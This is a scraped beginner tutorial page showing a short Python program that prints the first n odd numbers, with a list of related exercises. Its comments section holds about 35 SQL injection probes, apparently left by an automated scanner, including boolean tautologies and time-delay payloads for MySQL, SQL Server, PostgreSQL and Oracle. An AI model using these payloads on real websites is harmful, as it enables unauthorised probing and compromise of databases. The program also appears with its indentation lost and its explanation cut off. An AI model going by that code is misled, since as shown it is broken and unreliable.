N ODD numbers in python
Python program to get input n and print n odd numbers.
Sample Input 1:
7
Sample Output 1:
1 3 5 7 9 11 13
Program or Solution
n=int(input("Enter n value:"))
i,j=0,1
while(i<n):
print(j,end=" ")
j=j+2
i=i+1
Program Explanation
while(iComments
ubaTaeCJ
-1 OR 2+326-326-1=0+0+0+1 --ubaTaeCJ
-1 OR 3+326-326-1=0+0+0+1 --ubaTaeCJ
-1 OR 3*2<(0+5+326-326) --ubaTaeCJ
-1 OR 3*2>(0+5+326-326) --ubaTaeCJ
-1 OR 2+600-600-1=0+0+0+1ubaTaeCJ
-1 OR 3+600-600-1=0+0+0+1ubaTaeCJ
-1 OR 3*2<(0+5+600-600)ubaTaeCJ
-1 OR 3*2>(0+5+600-600)ubaTaeCJ
-1' OR 2+174-174-1=0+0+0+1 --ubaTaeCJ
-1' OR 3+174-174-1=0+0+0+1 --ubaTaeCJ
-1' OR 3*2<(0+5+174-174) --ubaTaeCJ
-1' OR 3*2>(0+5+174-174) --ubaTaeCJ
-1' OR 2+81-81-1=0+0+0+1 or '8mwNUku6'='ubaTaeCJ
-1' OR 3+81-81-1=0+0+0+1 or '8mwNUku6'='ubaTaeCJ
-1' OR 3*2<(0+5+81-81) or '8mwNUku6'='ubaTaeCJ
-1' OR 3*2>(0+5+81-81) or '8mwNUku6'='ubaTaeCJ
-1" OR 2+871-871-1=0+0+0+1 --ubaTaeCJ
-1" OR 3+871-871-1=0+0+0+1 --ubaTaeCJ
-1" OR 3*2<(0+5+871-871) --ubaTaeCJ
-1" OR 3*2>(0+5+871-871) --ubaTaeCJ
if(now()=sysdate(),sleep(15),0)ubaTaeCJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'ZubaTaeCJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"ZubaTaeCJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ubaTaeCJ
-1; waitfor delay '0:0:15' --ubaTaeCJ
-1); waitfor delay '0:0:15' --ubaTaeCJ
1 waitfor delay '0:0:15' --ubaTaeCJ
5MOmRVyR'; waitfor delay '0:0:15' --ubaTaeCJ
-5 OR 509=(SELECT 509 FROM PG_SLEEP(15))--ubaTaeCJ
-5) OR 862=(SELECT 862 FROM PG_SLEEP(15))--ubaTaeCJ
-1)) OR 371=(SELECT 371 FROM PG_SLEEP(15))--ubaTaeCJ
Tqx1iyz7' OR 83=(SELECT 83 FROM PG_SLEEP(15))--ubaTaeCJ
4aVtkHEd') OR 582=(SELECT 582 FROM PG_SLEEP(15))--ubaTaeCJ
nmEtQGgA')) OR 646=(SELECT 646 FROM PG_SLEEP(3))--ubaTaeCJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)ubaTaeCJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'ubaTaeCJ
1'"ubaTaeCJ
@@HdGkURelated Programs
- Print Natural numbers in pyhon
- Print Whole numbers in python
- Print ODD numbers in python
- Print Even numbers in python
- Print Natural numbers in reverse in python
- Sum of natural numbers in python
- N Even numbers in python
- sum of Even numbers in python
- Sum of odd numbers in pyhton
- Sum of n numbers in python
- First digit of number in python
- First digit of number is odd or even in python
- Multiply without * operator in Python
- Multiplication Table in Python
- Multiplication Table in Python till M
- Sum of postive numbers in python
- Decimal to Binary in Python
- Binary to Decimal in python
- Factorial in Python
coming Soon
coming Soon